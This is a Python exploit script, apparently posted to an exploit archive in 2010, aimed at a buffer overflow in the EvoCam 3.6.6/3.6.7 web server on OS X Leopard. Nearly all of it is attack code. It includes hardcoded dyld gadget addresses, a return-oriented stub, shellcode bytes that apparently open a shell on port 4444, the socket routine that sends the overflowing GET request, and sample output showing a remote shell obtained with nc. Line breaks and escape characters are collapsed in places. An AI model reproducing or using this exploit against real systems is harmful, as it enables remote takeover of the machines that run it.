
evocam-overflow.txt

Posted on 02 June 2010

#!/usr/bin/python # Exploit Title: OS X EvoCam Web Server Buffer Overflow Exploit 3.6.6 and 3.6.7 # Date: 1st June 2010 # Author: d1dn0t ( didnot __A-T__ me.com ) # Software Link: http://www.pizza.org/evocam.dmg # Version: EvoCam 3.6.6 and 3.6.7 # Tested on: OS X 10.5.8 Intel import socket import sys import struct from optparse import OptionParser # OS X EvoCam Web Server Buffer Overflow Exploit 3.6.6 and 3.6.7 # Tested on Leopard 10.5.8 Intel # Paul Harrington didnot __A-T__ me.com # #$ ./evocam.py -H 192.168.1.28 -P 8080 -T 2 #EvoLogical EvoCam 3.6.6/7 on OS X 10.5.8 Intel HTTP Buffer Overflow Exploit #didnot __A-T__ me.com #Targeting EvoCam Version 3.6.7 #[+] Sending evil buffer... #[+] Done! #[*] Check your shell at 192.168.1.28:4444 #$ nc -v 192.168.1.28 4444 #Connection to 192.168.1.28 4444 port [tcp/krb524] succeeded! #uname -a #Darwin Leopard-VM.local 9.8.0 Darwin Kernel Version 9.8.0: Wed Jul 15 16:55:01 PDT 2009; root:xnu-1228.15.4~1/RELEASE_I386 i386 print "EvoLogical EvoCam 3.6.6/7 on OS X 10.5.8 Intel HTTP Buffer Overflow Exploit" print "didnot __A-T__ me.com" usage = "%prog -H TARGET_HOST -P TARGET_PORT -T Target " parser = OptionParser(usage=usage) parser.add_option("-H", "--target_host", type="string", action="store", dest="HOST", help="Destination Host") parser.add_option("-P", "--target_port", type="int", action="store", dest="PORT", help="Destination Port") parser.add_option("-T", "--target", type="string", action="store", dest="TARGET", help="Target Version [1=3.6.6 2=3.6.7]") (options, args) = parser.parse_args() HOST = options.HOST PORT = options.PORT if options.TARGET == "1" : print "Targeting EvoCam Version 3.6.6" BUFLEN=1560 elif options.TARGET == "2" : print "Targeting EvoCam Version 3.6.7" BUFLEN=1308 else: BUFLEN=0 if not (HOST and PORT and BUFLEN): parser.print_help() sys.exit() # Settings for Leopard 10.5.8 WRITEABLE = 0x8fe66448 SETJMP = 0x8fe1cf38 #$ nm /usr/lib/dyld | grep "setjmp" #8fe1cf38 t _setjmp STRDUP = 0x8fe210dc #$ nm 
/usr/lib/dyld | grep "strdup" #8fe210dc t _strdup JMPEAX = 0x8fe01041 #0x8fe01041 <__dyld__dyld_start+49>: jmp *%eax NOP="x90x90" buf = \n"xdbxd2x29xc9xb1x27xbfxb1xd5xb6xd3xd9x74x24" + \n"xf4x5ax83xeaxfcx31x7ax14x03x7axa5x37x43xe2" + \n"x05x2exfcx45xd5x11xadx17x65xf0x80x18x8ax71" + \n"x64x19x94x75x10xdfxc6x27x70x88xe6xc5x65x14" + \n"x6fx2axefxb4x3cxfbxa2x04xaaxcexc3x17x4dx83" + \n"x95x85x21x49xd7xaax33xd0xb5xf8xe5xbex89xe3" + \n"xc4xbfx98x4fx5fx78x6dxabxdcx6cx8fx08xb1x25" + \n"xc3x3ex6fx07x63x4cxccx14x9fxb2xa7xebx51x75" + \n"x17x5cxc2x25x27x67x2fx45xd7x08x93x6bxa2x21" + \n"x5cx31x81xb2x1fx4cx19xc7x08x80xd9x77x5fxcd" + \n"xf6x04xf7x79x27x89x6ex14xbexaex21xb8x93x60" + \n"x72x03xdex01x43xb4xb0x88x47x64x60xd8xd7xd5" + \n"x30xd9x1ax55x01x26xf4x06x21x6bx75xac" FRAG0 = "x90" + "x58" + "x61" + "xc3" FRAG1 = "x90" + "x58" + "x89xe0" + "x83xc0x0e" + "x89x44x24x08" + "xc3" # 0C is a bad character STUB = \nFRAG0 + \nstruct.pack('<III',SETJMP,WRITEABLE+32,WRITEABLE) + \nFRAG1 + \n'A'*20 +\nstruct.pack('<IIIII',SETJMP,WRITEABLE+24,WRITEABLE,STRDUP,JMPEAX) + \n'A'*4 BUFFER = "A"*BUFLEN + STUB + NOP + buf s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect((HOST,PORT)) print '[+] Sending evil buffer...' s.send("GET " +BUFFER + " HTTP/1.0 ") print "[+] Done!" print "[*] Check your shell at %s:4444 " % HOST s.close()

 
